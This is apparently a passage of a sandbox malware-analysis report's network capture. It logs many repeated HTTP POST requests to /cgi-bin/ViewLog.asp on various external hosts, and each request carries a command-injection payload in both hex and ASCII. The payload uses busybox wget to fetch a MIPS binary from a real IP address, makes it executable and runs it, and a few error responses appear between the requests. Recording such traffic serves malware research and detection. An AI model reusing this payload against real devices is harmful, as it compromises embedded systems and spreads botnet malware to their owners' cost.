                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              299192.168.2.135127631.200.40.2078080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:32.369426012 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              300192.168.2.133928062.72.166.2418080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:32.496649981 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              301192.168.2.133408295.86.85.648080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:32.729989052 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              302192.168.2.134495231.220.67.1838080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:32.791497946 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              303192.168.2.135222694.121.70.1538080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:32.823349953 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              304192.168.2.136015231.200.35.938080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:32.849488974 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              305192.168.2.135116662.202.152.1798080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:33.358797073 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:37.414433956 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:43.558475018 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              306192.168.2.135758894.120.19.2218080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:33.377729893 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              307192.168.2.134636262.56.245.2248080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:33.405499935 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              308192.168.2.133407095.86.85.648080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:33.407830000 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              309192.168.2.134024831.173.123.508080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:33.460207939 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:33.758929014 CET530INHTTP/1.1 404 Not Found
                                              Date: Thu, 23 Nov 2023 09:16:32 GMT
                                              Server: Webs
                                              X-Frame-Options: SAMEORIGIN
                                              X-Content-Type-Options: nosniff
                                              X-XSS-Protection: 1;mode=block
                                              Cache-Control: no-store
                                              Content-Length: 166
                                              Content-Type: text/html
                                              Connection: keep-alive
                                              Keep-Alive: timeout=60, max=99
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              310192.168.2.134239085.240.107.1158080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:36.820509911 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              311192.168.2.134107462.171.177.1558080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:40.245472908 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              312192.168.2.135066894.125.123.1328080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:40.266135931 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:40.489428043 CET375INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 23 Nov 2023 04:16:40 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Content-Length: 146
                                              Connection: keep-alive
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              313192.168.2.134411431.13.239.48080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:40.268248081 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:40.495704889 CET313INHTTP/1.1 501 Not Implemented
                                              Connection: Keep-Alive
                                              Content-Length: 121
                                              Date: Thu, 23 Nov 2023 04:16:25 GMT
                                              Expires: 0
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 35 30 31 3a 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 35 30 31 3a 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <html><head><title>Error 501: Not Implemented</title></head><body><h1>Error 501: Not Implemented</h1></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              314192.168.2.135771495.158.132.768080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:40.495049000 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:40.720305920 CET278INHTTP/1.1 403 Forbidden
                                              Content-Type: text/html; charset=utf-8
                                              Content-Length: 106
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              315192.168.2.135983894.121.131.1948080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:40.678746939 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              316192.168.2.135895031.136.24.1838080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:40.864105940 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:41.446451902 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:42.566421032 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
